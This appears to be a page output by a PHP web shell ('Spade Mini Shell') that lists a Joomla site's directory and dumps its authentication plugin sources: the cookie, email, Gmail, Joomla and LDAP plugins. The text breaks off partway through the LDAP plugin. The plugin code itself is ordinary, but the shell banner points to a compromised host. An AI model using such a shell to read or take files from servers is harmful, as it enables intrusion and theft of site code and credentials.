Spade
Mini Shell
| Directory:~$ /home/lmsyaran/public_html/joomla4/ |
| [Home] [System Details] [Kill Me] |
cookie/cookie.php000064400000026760151157642600010021 0ustar00<?php
/**
* @package Joomla.Plugin
* @subpackage Authentication.cookie
*
* @copyright Copyright (C) 2005 - 2020 Open Source Matters, Inc. All
rights reserved.
* @license GNU General Public License version 2 or later; see
LICENSE.txt
*/
defined('_JEXEC') or die;
/**
* Joomla Authentication plugin
*
* @since 3.2
* @note Code based on
http://jaspan.com/improved_persistent_login_cookie_best_practice
* and
http://fishbowl.pastiche.org/2004/01/19/persistent_login_cookie_best_practice/
*/
class PlgAuthenticationCookie extends JPlugin
{
/**
* Application object
*
* @var JApplicationCms
* @since 3.2
*/
protected $app;
/**
* Database object
*
* @var JDatabaseDriver
* @since 3.2
*/
protected $db;
/**
* Reports the privacy related capabilities for this plugin to site
administrators.
*
* @return array
*
* @since 3.9.0
*/
public function onPrivacyCollectAdminCapabilities()
{
$this->loadLanguage();
return array(
JText::_('PLG_AUTHENTICATION_COOKIE') => array(
JText::_('PLG_AUTH_COOKIE_PRIVACY_CAPABILITY_COOKIE'),
)
);
}
/**
* This method should handle any authentication and report back to the
subject
*
* @param array $credentials Array holding the user credentials
* @param array $options Array of extra options
* @param object &$response Authentication response object
*
* @return boolean
*
* @since 3.2
*/
public function onUserAuthenticate($credentials, $options, &$response)
{
// No remember me for admin
if ($this->app->isClient('administrator'))
{
return false;
}
// Get cookie
$cookieName = 'joomla_remember_me_' .
JUserHelper::getShortHashedUserAgent();
$cookieValue = $this->app->input->cookie->get($cookieName);
// Try with old cookieName (pre 3.6.0) if not found
if (!$cookieValue)
{
$cookieName = JUserHelper::getShortHashedUserAgent();
$cookieValue = $this->app->input->cookie->get($cookieName);
}
if (!$cookieValue)
{
return false;
}
$cookieArray = explode('.', $cookieValue);
// Check for valid cookie value
if (count($cookieArray) !== 2)
{
// Destroy the cookie in the browser.
$this->app->input->cookie->set($cookieName, '', 1,
$this->app->get('cookie_path', '/'),
$this->app->get('cookie_domain', ''));
JLog::add('Invalid cookie detected.', JLog::WARNING,
'error');
return false;
}
$response->type = 'Cookie';
// Filter series since we're going to use it in the query
$filter = new JFilterInput;
$series = $filter->clean($cookieArray[1], 'ALNUM');
// Remove expired tokens
$query = $this->db->getQuery(true)
->delete('#__user_keys')
->where($this->db->quoteName('time') . ' <
' . $this->db->quote(time()));
try
{
$this->db->setQuery($query)->execute();
}
catch (RuntimeException $e)
{
// We aren't concerned with errors from this query, carry on
}
// Find the matching record if it exists.
$query = $this->db->getQuery(true)
->select($this->db->quoteName(array('user_id',
'token', 'series', 'time')))
->from($this->db->quoteName('#__user_keys'))
->where($this->db->quoteName('series') . ' =
' . $this->db->quote($series))
->where($this->db->quoteName('uastring') . ' =
' . $this->db->quote($cookieName))
->order($this->db->quoteName('time') . '
DESC');
try
{
$results = $this->db->setQuery($query)->loadObjectList();
}
catch (RuntimeException $e)
{
$response->status = JAuthentication::STATUS_FAILURE;
return false;
}
if (count($results) !== 1)
{
// Destroy the cookie in the browser.
$this->app->input->cookie->set($cookieName, '', 1,
$this->app->get('cookie_path', '/'),
$this->app->get('cookie_domain', ''));
$response->status = JAuthentication::STATUS_FAILURE;
return false;
}
// We have a user with one cookie with a valid series and a corresponding
record in the database.
if (!JUserHelper::verifyPassword($cookieArray[0], $results[0]->token))
{
/*
* This is a real attack!
* Either the series was guessed correctly or a cookie was stolen and
used twice (once by attacker and once by victim).
* Delete all tokens for this user!
*/
$query = $this->db->getQuery(true)
->delete('#__user_keys')
->where($this->db->quoteName('user_id') . ' =
' . $this->db->quote($results[0]->user_id));
try
{
$this->db->setQuery($query)->execute();
}
catch (RuntimeException $e)
{
// Log an alert for the site admin
JLog::add(
sprintf('Failed to delete cookie token for user %s with the
following error: %s', $results[0]->user_id, $e->getMessage()),
JLog::WARNING,
'security'
);
}
// Destroy the cookie in the browser.
$this->app->input->cookie->set($cookieName, '', 1,
$this->app->get('cookie_path', '/'),
$this->app->get('cookie_domain', ''));
// Issue warning by email to user and/or admin?
JLog::add(JText::sprintf('PLG_AUTH_COOKIE_ERROR_LOG_LOGIN_FAILED',
$results[0]->user_id), JLog::WARNING, 'security');
$response->status = JAuthentication::STATUS_FAILURE;
return false;
}
// Make sure there really is a user with this name and get the data for
the session.
$query = $this->db->getQuery(true)
->select($this->db->quoteName(array('id',
'username', 'password')))
->from($this->db->quoteName('#__users'))
->where($this->db->quoteName('username') . ' =
' . $this->db->quote($results[0]->user_id))
->where($this->db->quoteName('requireReset') . '
= 0');
try
{
$result = $this->db->setQuery($query)->loadObject();
}
catch (RuntimeException $e)
{
$response->status = JAuthentication::STATUS_FAILURE;
return false;
}
if ($result)
{
// Bring this in line with the rest of the system
$user = JUser::getInstance($result->id);
// Set response data.
$response->username = $result->username;
$response->email = $user->email;
$response->fullname = $user->name;
$response->password = $result->password;
$response->language = $user->getParam('language');
// Set response status.
$response->status = JAuthentication::STATUS_SUCCESS;
$response->error_message = '';
}
else
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_NO_USER');
}
}
/**
* We set the authentication cookie only after login is successfully
finished.
* We set a new cookie either for a user with no cookies or one
* where the user used a cookie to authenticate.
*
* @param array $options Array holding options
*
* @return boolean True on success
*
* @since 3.2
*/
public function onUserAfterLogin($options)
{
// No remember me for admin
if ($this->app->isClient('administrator'))
{
return false;
}
if (isset($options['responseType']) &&
$options['responseType'] === 'Cookie')
{
// Logged in using a cookie
$cookieName = 'joomla_remember_me_' .
JUserHelper::getShortHashedUserAgent();
// We need the old data to get the existing series
$cookieValue = $this->app->input->cookie->get($cookieName);
// Try with old cookieName (pre 3.6.0) if not found
if (!$cookieValue)
{
$oldCookieName = JUserHelper::getShortHashedUserAgent();
$cookieValue =
$this->app->input->cookie->get($oldCookieName);
// Destroy the old cookie in the browser
$this->app->input->cookie->set($oldCookieName,
'', 1, $this->app->get('cookie_path',
'/'), $this->app->get('cookie_domain',
''));
}
$cookieArray = explode('.', $cookieValue);
// Filter series since we're going to use it in the query
$filter = new JFilterInput;
$series = $filter->clean($cookieArray[1], 'ALNUM');
}
elseif (!empty($options['remember']))
{
// Remember checkbox is set
$cookieName = 'joomla_remember_me_' .
JUserHelper::getShortHashedUserAgent();
// Create a unique series which will be used over the lifespan of the
cookie
$unique = false;
$errorCount = 0;
do
{
$series = JUserHelper::genRandomPassword(20);
$query = $this->db->getQuery(true)
->select($this->db->quoteName('series'))
->from($this->db->quoteName('#__user_keys'))
->where($this->db->quoteName('series') . ' =
' . $this->db->quote($series));
try
{
$results = $this->db->setQuery($query)->loadResult();
if ($results === null)
{
$unique = true;
}
}
catch (RuntimeException $e)
{
$errorCount++;
// We'll let this query fail up to 5 times before giving up,
there's probably a bigger issue at this point
if ($errorCount === 5)
{
return false;
}
}
}
while ($unique === false);
}
else
{
return false;
}
// Get the parameter values
$lifetime = $this->params->get('cookie_lifetime', 60) *
24 * 60 * 60;
$length = $this->params->get('key_length', 16);
// Generate new cookie
$token = JUserHelper::genRandomPassword($length);
$cookieValue = $token . '.' . $series;
// Overwrite existing cookie with new value
$this->app->input->cookie->set(
$cookieName,
$cookieValue,
time() + $lifetime,
$this->app->get('cookie_path', '/'),
$this->app->get('cookie_domain', ''),
$this->app->isHttpsForced(),
true
);
$query = $this->db->getQuery(true);
if (!empty($options['remember']))
{
// Create new record
$query
->insert($this->db->quoteName('#__user_keys'))
->set($this->db->quoteName('user_id') . ' =
' . $this->db->quote($options['user']->username))
->set($this->db->quoteName('series') . ' =
' . $this->db->quote($series))
->set($this->db->quoteName('uastring') . ' =
' . $this->db->quote($cookieName))
->set($this->db->quoteName('time') . ' = '
. (time() + $lifetime));
}
else
{
// Update existing record with new token
$query
->update($this->db->quoteName('#__user_keys'))
->where($this->db->quoteName('user_id') . ' =
' . $this->db->quote($options['user']->username))
->where($this->db->quoteName('series') . ' =
' . $this->db->quote($series))
->where($this->db->quoteName('uastring') . ' =
' . $this->db->quote($cookieName));
}
$hashedToken = JUserHelper::hashPassword($token);
$query->set($this->db->quoteName('token') . ' =
' . $this->db->quote($hashedToken));
try
{
$this->db->setQuery($query)->execute();
}
catch (RuntimeException $e)
{
return false;
}
return true;
}
/**
* This is where we delete any authentication cookie when a user logs out
*
* @param array $options Array holding options (length,
timeToExpiration)
*
* @return boolean True on success
*
* @since 3.2
*/
public function onUserAfterLogout($options)
{
// No remember me for admin
if ($this->app->isClient('administrator'))
{
return false;
}
$cookieName = 'joomla_remember_me_' .
JUserHelper::getShortHashedUserAgent();
$cookieValue = $this->app->input->cookie->get($cookieName);
// There are no cookies to delete.
if (!$cookieValue)
{
return true;
}
$cookieArray = explode('.', $cookieValue);
// Filter series since we're going to use it in the query
$filter = new JFilterInput;
$series = $filter->clean($cookieArray[1], 'ALNUM');
// Remove the record from the database
$query = $this->db->getQuery(true)
->delete('#__user_keys')
->where($this->db->quoteName('series') . ' =
' . $this->db->quote($series));
try
{
$this->db->setQuery($query)->execute();
}
catch (RuntimeException $e)
{
// We aren't concerned with errors from this query, carry on
}
// Destroy the cookie
$this->app->input->cookie->set($cookieName, '', 1,
$this->app->get('cookie_path', '/'),
$this->app->get('cookie_domain', ''));
return true;
}
}
cookie/cookie.xml000064400000003033151157642600010016 0ustar00<?xml
version="1.0" encoding="utf-8"?>
<extension version="3.2" type="plugin"
group="authentication" method="upgrade">
<name>plg_authentication_cookie</name>
<author>Joomla! Project</author>
<creationDate>July 2013</creationDate>
<copyright>Copyright (C) 2005 - 2020 Open Source Matters. All rights
reserved.</copyright>
<license>GNU General Public License version 2 or later; see
LICENSE.txt</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>PLG_AUTH_COOKIE_XML_DESCRIPTION</description>
<files>
<filename plugin="cookie">cookie.php</filename>
</files>
<languages>
<language
tag="en-GB">en-GB.plg_authentication_cookie.ini</language>
<language
tag="en-GB">en-GB.plg_authentication_cookie.sys.ini</language>
</languages>
<config>
<fields name="params">
<fieldset name="basic">
<field
name="cookie_lifetime"
type="number"
label="PLG_AUTH_COOKIE_FIELD_COOKIE_LIFETIME_LABEL"
description="PLG_AUTH_COOKIE_FIELD_COOKIE_LIFETIME_DESC"
default="60"
filter="integer"
required="true"
/>
<field
name="key_length"
type="list"
label="PLG_AUTH_COOKIE_FIELD_KEY_LENGTH_LABEL"
description="PLG_AUTH_COOKIE_FIELD_KEY_LENGTH_DESC"
default="16"
filter="integer"
required="true"
>
<option value="8">8</option>
<option value="16">16</option>
<option value="32">32</option>
<option value="64">64</option>
</field>
</fieldset>
</fields>
</config>
</extension>
email/email.php000064400000004203151157642600007441 0ustar00<?php
/**
* @version $Id: email.php 20196 2011-03-04 02:40:25Z mrichey $
* @package plg_auth_email
* @copyright Copyright (C) 2005 - 2011 Michael Richey. All rights
reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
// No direct access
defined('_JEXEC') or die;
jimport('joomla.plugin.plugin');
class plgAuthenticationEmail extends JPlugin {
/**
* This method should handle any authentication and report back to the
subject
*/
function onUserAuthenticate(&$credentials, $options,
&$response) {
// Get a database object
$db = JFactory::getDbo();
$query = $db->getQuery(true);
$query->select('u.id, username, password');
$query->from($db->quoteName('#__users','u'));
$query->join('inner',$db->quoteName('#__reservation_consultant','co')
.'on
('.$db->quoteName('co.userid').'='.$db->quoteName('u.id').')'
);
$query->where(
$db->quoteName('co.phonenumber').'='.$db->Quote($credentials['username']));
$db->setQuery($query);
$result = $db->loadObject();
if (empty($result))
{
$db = JFactory::getDbo();
$query = $db->getQuery(true);
$query->select('u.id, username, password');
$query->from($db->quoteName('#__users','u'));
$query->join('inner',$db->quoteName('#__reservation_sick','s')
.'on
('.$db->quoteName('s.userid').'='.$db->quoteName('u.id').')'
);
$query->where(
$db->quoteName('s.phoneNumber').'='.$db->Quote($credentials['username']));
$db->setQuery($query);
$result = $db->loadObject();
}
if ($result) {
// why mess with re-creating authentication - just use the
system.
$credentials['username'] = $result->username;
require_once JPATH_PLUGINS .
'/authentication/joomla/joomla.php';
PlgAuthenticationJoomla::onUserAuthenticate($credentials,
$options, $response);
} else {
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_INVALID_PASS');
}
}
}
email/email.xml000064400000001600151157642600007450 0ustar00<?xml
version="1.0" encoding="utf-8"?>
<extension version="2.5" type="plugin"
group="authentication" method="upgrade">
<name>plg_authentication_email</name>
<author>Michael Richey</author>
<creationDate>March 2011</creationDate>
<copyright>Copyright (C) 2005 - 2011 Michael Richey. All rights
reserved.</copyright>
<license>GNU General Public License version 2 or later; see
LICENSE.txt</license>
<authorEmail>authemail@richeyweb.com</authorEmail>
<authorUrl>www.richeyweb.com</authorUrl>
<version>2.3.1</version>
<description>PLG_AUTH_EMAIL_XML_DESCRIPTION</description>
<files>
<filename plugin="email">email.php</filename>
<filename>index.html</filename>
</files>
<languages folder="language">
<language
tag="en-GB">en-GB/en-GB.plg_authentication_email.ini</language>
<language
tag="en-GB">en-GB/en-GB.plg_authentication_email.sys.ini</language>
</languages>
</extension>
email/index.html000064400000000035151157642600007635 0ustar00<html>
<body>
</body>
</html>gmail/gmail.php000064400000014552151157642600007455
0ustar00<?php
/**
* @package Joomla.Plugin
* @subpackage Authentication.gmail
*
* @copyright Copyright (C) 2005 - 2020 Open Source Matters, Inc. All
rights reserved.
* @license GNU General Public License version 2 or later; see
LICENSE.txt
*/
defined('_JEXEC') or die;
use Joomla\CMS\Authentication\AuthenticationResponse;
use Joomla\Registry\Registry;
/**
* GMail Authentication Plugin
*
* @since 1.5
*/
class PlgAuthenticationGMail extends JPlugin
{
/**
* This method should handle any authentication and report back to the
subject
*
* @param array $credentials Array holding the user
credentials
* @param array $options Array of extra options
* @param AuthenticationResponse &$response Authentication
response object
*
* @return void
*
* @since 1.5
*/
public function onUserAuthenticate($credentials, $options, &$response)
{
// Load plugin language
$this->loadLanguage();
// No backend authentication
if (JFactory::getApplication()->isClient('administrator')
&& !$this->params->get('backendLogin', 0))
{
return;
}
$success = false;
$curlParams = array(
'follow_location' => true,
'transport.curl' => array(
CURLOPT_SSL_VERIFYPEER =>
$this->params->get('verifypeer', 1)
),
);
$transportParams = new Registry($curlParams);
try
{
$http = JHttpFactory::getHttp($transportParams, 'curl');
}
catch (RuntimeException $e)
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->type = 'GMail';
$response->error_message =
JText::sprintf('JGLOBAL_AUTH_FAILED',
JText::_('JGLOBAL_AUTH_CURL_NOT_INSTALLED'));
return;
}
// Check if we have a username and password
if ($credentials['username'] === '' ||
$credentials['password'] === '')
{
$response->type = 'GMail';
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::sprintf('JGLOBAL_AUTH_FAILED',
JText::_('JGLOBAL_AUTH_USER_BLACKLISTED'));
return;
}
$blacklist = explode(',',
$this->params->get('user_blacklist', ''));
// Check if the username isn't blacklisted
if (in_array($credentials['username'], $blacklist))
{
$response->type = 'GMail';
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::sprintf('JGLOBAL_AUTH_FAILED',
JText::_('JGLOBAL_AUTH_USER_BLACKLISTED'));
return;
}
$suffix = $this->params->get('suffix',
'');
$applysuffix = $this->params->get('applysuffix', 0);
$offset = strpos($credentials['username'], '@');
// Check if we want to do suffix stuff, typically for Google Apps for
Your Domain
if ($suffix && $applysuffix)
{
if ($applysuffix == 1 && $offset === false)
{
// Apply suffix if missing
$credentials['username'] .= '@' . $suffix;
}
elseif ($applysuffix == 2)
{
// Always use suffix
if ($offset)
{
// If we already have an @, get rid of it and replace it
$credentials['username'] =
substr($credentials['username'], 0, $offset);
}
$credentials['username'] .= '@' . $suffix;
}
}
$headers = array(
'Authorization' => 'Basic ' .
base64_encode($credentials['username'] . ':' .
$credentials['password'])
);
try
{
$result =
$http->get('https://mail.google.com/mail/feed/atom',
$headers);
}
catch (Exception $e)
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->type = 'GMail';
$response->error_message =
JText::sprintf('JGLOBAL_AUTH_FAILED',
JText::_('JGLOBAL_AUTH_UNKNOWN_ACCESS_DENIED'));
return;
}
$code = $result->code;
switch ($code)
{
case 200 :
$message = JText::_('JGLOBAL_AUTH_ACCESS_GRANTED');
$success = true;
break;
case 401 :
$message = JText::_('JGLOBAL_AUTH_ACCESS_DENIED');
break;
default :
$message = JText::_('JGLOBAL_AUTH_UNKNOWN_ACCESS_DENIED');
break;
}
$response->type = 'GMail';
if (!$success)
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::sprintf('JGLOBAL_AUTH_FAILED', $message);
return;
}
if (strpos($credentials['username'], '@') === false)
{
if ($suffix)
{
// If there is a suffix then we want to apply it
$email = $credentials['username'] . '@' . $suffix;
}
else
{
// If there isn't a suffix just use the default gmail one
$email = $credentials['username'] . '@gmail.com';
}
}
else
{
// The username looks like an email address (probably is) so use that
$email = $credentials['username'];
}
// Extra security checks with existing local accounts
$db = JFactory::getDbo();
$localUsernameChecks = array(strstr($email, '@', true),
$email);
$query = $db->getQuery(true)
->select('id, activation, username, email, block')
->from('#__users')
->where('username IN(' . implode(',',
array_map(array($db, 'quote'), $localUsernameChecks)) .
')'
. ' OR email = ' . $db->quote($email)
);
$db->setQuery($query);
if ($localUsers = $db->loadObjectList())
{
foreach ($localUsers as $localUser)
{
// Local user exists with same username but different email address
if ($email !== $localUser->email)
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::sprintf('JGLOBAL_AUTH_FAILED',
JText::_('PLG_GMAIL_ERROR_LOCAL_USERNAME_CONFLICT'));
return;
}
else
{
// Existing user disabled locally
if ($localUser->block || !empty($localUser->activation))
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_ACCESS_DENIED');
return;
}
// We will always keep the local username for existing accounts
$credentials['username'] = $localUser->username;
break;
}
}
}
elseif
(JFactory::getApplication()->isClient('administrator'))
{
// We wont' allow backend access without local account
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message = JText::_('JERROR_LOGIN_DENIED');
return;
}
$response->status = JAuthentication::STATUS_SUCCESS;
$response->error_message = '';
$response->email = $email;
// Reset the username to what we ended up using
$response->username = $credentials['username'];
$response->fullname = $credentials['username'];
}
}
gmail/gmail.xml000064400000004515151157642600007464 0ustar00<?xml
version="1.0" encoding="utf-8"?>
<extension version="3.1" type="plugin"
group="authentication" method="upgrade">
<name>plg_authentication_gmail</name>
<author>Joomla! Project</author>
<creationDate>February 2006</creationDate>
<copyright>Copyright (C) 2005 - 2020 Open Source Matters. All rights
reserved.</copyright>
<license>GNU General Public License version 2 or later; see
LICENSE.txt</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>PLG_GMAIL_XML_DESCRIPTION</description>
<files>
<filename plugin="gmail">gmail.php</filename>
</files>
<languages>
<language
tag="en-GB">en-GB.plg_authentication_gmail.ini</language>
<language
tag="en-GB">en-GB.plg_authentication_gmail.sys.ini</language>
</languages>
<config>
<fields name="params">
<fieldset name="basic">
<field
name="applysuffix"
type="list"
label="PLG_GMAIL_FIELD_APPLYSUFFIX_LABEL"
description="PLG_GMAIL_FIELD_APPLYSUFFIX_DESC"
default="0"
filter="integer"
>
<option
value="0">PLG_GMAIL_FIELD_VALUE_NOAPPLYSUFFIX</option>
<option
value="1">PLG_GMAIL_FIELD_VALUE_APPLYSUFFIXMISSING</option>
<option
value="2">PLG_GMAIL_FIELD_VALUE_APPLYSUFFIXALWAYS</option>
</field>
<field
name="suffix"
type="text"
label="PLG_GMAIL_FIELD_SUFFIX_LABEL"
description="PLG_GMAIL_FIELD_SUFFIX_DESC"
size="20"
showon="applysuffix:1,2"
/>
<field
name="verifypeer"
type="radio"
label="PLG_GMAIL_FIELD_VERIFYPEER_LABEL"
description="PLG_GMAIL_FIELD_VERIFYPEER_DESC"
default="1"
filter="integer"
class="btn-group btn-group-yesno"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
<field
name="user_blacklist"
type="text"
label="PLG_GMAIL_FIELD_USER_BLACKLIST_LABEL"
description="PLG_GMAIL_FIELD_USER_BLACKLIST_DESC"
size="20"
/>
<field
name="backendLogin"
type="radio"
label="PLG_GMAIL_FIELD_BACKEND_LOGIN_LABEL"
description="PLG_GMAIL_FIELD_BACKEND_LOGIN_DESC"
default="0"
filter="integer"
class="btn-group btn-group-yesno"
>
<option value="1">JENABLED</option>
<option value="0">JDISABLED</option>
</field>
</fieldset>
</fields>
</config>
</extension>
joomla/joomla.php000064400000014003151157642600010024 0ustar00<?php
/**
* @package Joomla.Plugin
* @subpackage Authentication.joomla
*
* @copyright Copyright (C) 2005 - 2020 Open Source Matters, Inc. All
rights reserved.
* @license GNU General Public License version 2 or later; see
LICENSE.txt
*/
defined('_JEXEC') or die;
/**
* Joomla Authentication plugin
*
* @since 1.5
*/
class PlgAuthenticationJoomla extends JPlugin
{
/**
* This method should handle any authentication and report back to the
subject
*
* @param array $credentials Array holding the user credentials
* @param array $options Array of extra options
* @param object &$response Authentication response object
*
* @return void
*
* @since 1.5
*/
public function onUserAuthenticate($credentials, $options, &$response)
{
$response->type = 'Joomla';
// Joomla does not like blank passwords
if (empty($credentials['password']))
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_EMPTY_PASS_NOT_ALLOWED');
return;
}
// Get a database object
$db = JFactory::getDbo();
$query = $db->getQuery(true)
->select('id, password')
->from('#__users')
->where('username=' .
$db->quote($credentials['username']));
$db->setQuery($query);
$result = $db->loadObject();
if ($result)
{
$match = JUserHelper::verifyPassword($credentials['password'],
$result->password, $result->id);
if ($match === true)
{
// Bring this in line with the rest of the system
$user = JUser::getInstance($result->id);
$response->email = $user->email;
$response->fullname = $user->name;
if (JFactory::getApplication()->isClient('administrator'))
{
$response->language =
$user->getParam('admin_language');
}
else
{
$response->language = $user->getParam('language');
}
$response->status = JAuthentication::STATUS_SUCCESS;
$response->error_message = '';
}
else
{
// Invalid password
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_INVALID_PASS');
}
}
else
{
// Let's hash the entered password even if we don't have a
matching user for some extra response time
// By doing so, we mitigate side channel user enumeration attacks
JUserHelper::hashPassword($credentials['password']);
// Invalid user
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_NO_USER');
}
// Check the two factor authentication
if ($response->status === JAuthentication::STATUS_SUCCESS)
{
$methods = JAuthenticationHelper::getTwoFactorMethods();
if (count($methods) <= 1)
{
// No two factor authentication method is enabled
return;
}
JModelLegacy::addIncludePath(JPATH_ADMINISTRATOR .
'/components/com_users/models', 'UsersModel');
/** @var UsersModelUser $model */
$model = JModelLegacy::getInstance('User',
'UsersModel', array('ignore_request' => true));
// Load the user's OTP (one time password, a.k.a. two factor auth)
configuration
if (!array_key_exists('otp_config', $options))
{
$otpConfig = $model->getOtpConfig($result->id);
$options['otp_config'] = $otpConfig;
}
else
{
$otpConfig = $options['otp_config'];
}
// Check if the user has enabled two factor authentication
if (empty($otpConfig->method) || ($otpConfig->method ===
'none'))
{
// Warn the user if they are using a secret code but they have not
// enabled two factor auth in their account.
if (!empty($credentials['secretkey']))
{
try
{
$app = JFactory::getApplication();
$this->loadLanguage();
$app->enqueueMessage(JText::_('PLG_AUTH_JOOMLA_ERR_SECRET_CODE_WITHOUT_TFA'),
'warning');
}
catch (Exception $exc)
{
// This happens when we are in CLI mode. In this case
// no warning is issued
return;
}
}
return;
}
// Try to validate the OTP
FOFPlatform::getInstance()->importPlugin('twofactorauth');
$otpAuthReplies =
FOFPlatform::getInstance()->runPlugins('onUserTwofactorAuthenticate',
array($credentials, $options));
$check = false;
/*
* This looks like noob code but DO NOT TOUCH IT and do not convert
* to in_array(). During testing in_array() inexplicably returned
* null when the OTEP begins with a zero! o_O
*/
if (!empty($otpAuthReplies))
{
foreach ($otpAuthReplies as $authReply)
{
$check = $check || $authReply;
}
}
// Fall back to one time emergency passwords
if (!$check)
{
// Did the user use an OTEP instead?
if (empty($otpConfig->otep))
{
if (empty($otpConfig->method) || ($otpConfig->method ===
'none'))
{
// Two factor authentication is not enabled on this account.
// Any string is assumed to be a valid OTEP.
return;
}
else
{
/*
* Two factor authentication enabled and no OTEPs defined. The
* user has used them all up. Therefore anything they enter is
* an invalid OTEP.
*/
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_INVALID_SECRETKEY');
return;
}
}
// Clean up the OTEP (remove dashes, spaces and other funny stuff
// our beloved users may have unwittingly stuffed in it)
$otep = $credentials['secretkey'];
$otep = filter_var($otep, FILTER_SANITIZE_NUMBER_INT);
$otep = str_replace('-', '', $otep);
$check = false;
// Did we find a valid OTEP?
if (in_array($otep, $otpConfig->otep))
{
// Remove the OTEP from the array
$otpConfig->otep = array_diff($otpConfig->otep, array($otep));
$model->setOtpConfig($result->id, $otpConfig);
// Return true; the OTEP was a valid one
$check = true;
}
}
if (!$check)
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_INVALID_SECRETKEY');
}
}
}
}
joomla/joomla.xml000064400000001505151157642600010040 0ustar00<?xml
version="1.0" encoding="utf-8"?>
<extension version="3.1" type="plugin"
group="authentication" method="upgrade">
<name>plg_authentication_joomla</name>
<author>Joomla! Project</author>
<creationDate>November 2005</creationDate>
<copyright>Copyright (C) 2005 - 2020 Open Source Matters. All rights
reserved.</copyright>
<license>GNU General Public License version 2 or later; see
LICENSE.txt</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>PLG_AUTH_JOOMLA_XML_DESCRIPTION</description>
<files>
<filename plugin="joomla">joomla.php</filename>
</files>
<languages>
<language
tag="en-GB">en-GB.plg_authentication_joomla.ini</language>
<language
tag="en-GB">en-GB.plg_authentication_joomla.sys.ini</language>
</languages>
</extension>
ldap/ldap.php000064400000011775151157642600007137 0ustar00<?php
/**
* @package Joomla.Plugin
* @subpackage Authentication.ldap
*
* @copyright Copyright (C) 2005 - 2020 Open Source Matters, Inc. All
rights reserved.
* @license GNU General Public License version 2 or later; see
LICENSE.txt
*/
defined('_JEXEC') or die;
use Joomla\Ldap\LdapClient;
/**
* LDAP Authentication Plugin
*
* @since 1.5
*/
class PlgAuthenticationLdap extends JPlugin
{
/**
* This method should handle any authentication and report back to the
subject
*
* @param array $credentials Array holding the user credentials
* @param array $options Array of extra options
* @param object &$response Authentication response object
*
* @return boolean
*
* @since 1.5
*/
public function onUserAuthenticate($credentials, $options, &$response)
{
$userdetails = null;
$success = 0;
$userdetails = array();
// For JLog
$response->type = 'LDAP';
// Strip null bytes from the password
$credentials['password'] = str_replace(chr(0), '',
$credentials['password']);
// LDAP does not like Blank passwords (tries to Anon Bind which is bad)
if (empty($credentials['password']))
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_EMPTY_PASS_NOT_ALLOWED');
return false;
}
// Load plugin params info
$ldap_email = $this->params->get('ldap_email');
$ldap_fullname = $this->params->get('ldap_fullname');
$ldap_uid = $this->params->get('ldap_uid');
$auth_method = $this->params->get('auth_method');
$ldap = new LdapClient($this->params);
if (!$ldap->connect())
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_NOT_CONNECT');
return;
}
switch ($auth_method)
{
case 'search':
{
// Bind using Connect Username/password
// Force anon bind to mitigate misconfiguration like [#7119]
if ($this->params->get('username', '') !==
'')
{
$bindtest = $ldap->bind();
}
else
{
$bindtest = $ldap->anonymous_bind();
}
if ($bindtest)
{
// Search for users DN
$binddata = $this->searchByString(
str_replace(
'[search]',
str_replace(';', '\3b',
$ldap->escape($credentials['username'], null,
LDAP_ESCAPE_FILTER)),
$this->params->get('search_string')
),
$ldap
);
if (isset($binddata[0], $binddata[0]['dn']))
{
// Verify Users Credentials
$success = $ldap->bind($binddata[0]['dn'],
$credentials['password'], 1);
// Get users details
$userdetails = $binddata;
}
else
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_NO_USER');
}
}
else
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_NOT_CONNECT');
}
} break;
case 'bind':
{
// We just accept the result here
$success =
$ldap->bind($ldap->escape($credentials['username'], null,
LDAP_ESCAPE_DN), $credentials['password']);
if ($success)
{
$userdetails = $this->searchByString(
str_replace(
'[search]',
str_replace(';', '\3b',
$ldap->escape($credentials['username'], null,
LDAP_ESCAPE_FILTER)),
$this->params->get('search_string')
),
$ldap
);
}
else
{
$response->status = JAuthentication::STATUS_FAILURE;
$response->error_message =
JText::_('JGLOBAL_AUTH_INVALID_PASS');
}
} break;
}
if (!$success)
{
$response->status = JAuthentication::STATUS_FAILURE;
if ($response->error_message === '')
{
$response->error_message =
JText::_('JGLOBAL_AUTH_INVALID_PASS');
}
}
else
{
// Grab some details from LDAP and return them
if (isset($userdetails[0][$ldap_uid][0]))
{
$response->username = $userdetails[0][$ldap_uid][0];
}
if (isset($userdetails[0][$ldap_email][0]))
{
$response->email = $userdetails[0][$ldap_email][0];
}
if (isset($userdetails[0][$ldap_fullname][0]))
{
$response->fullname = $userdetails[0][$ldap_fullname][0];
}
else
{
$response->fullname = $credentials['username'];
}
// Were good - So say so.
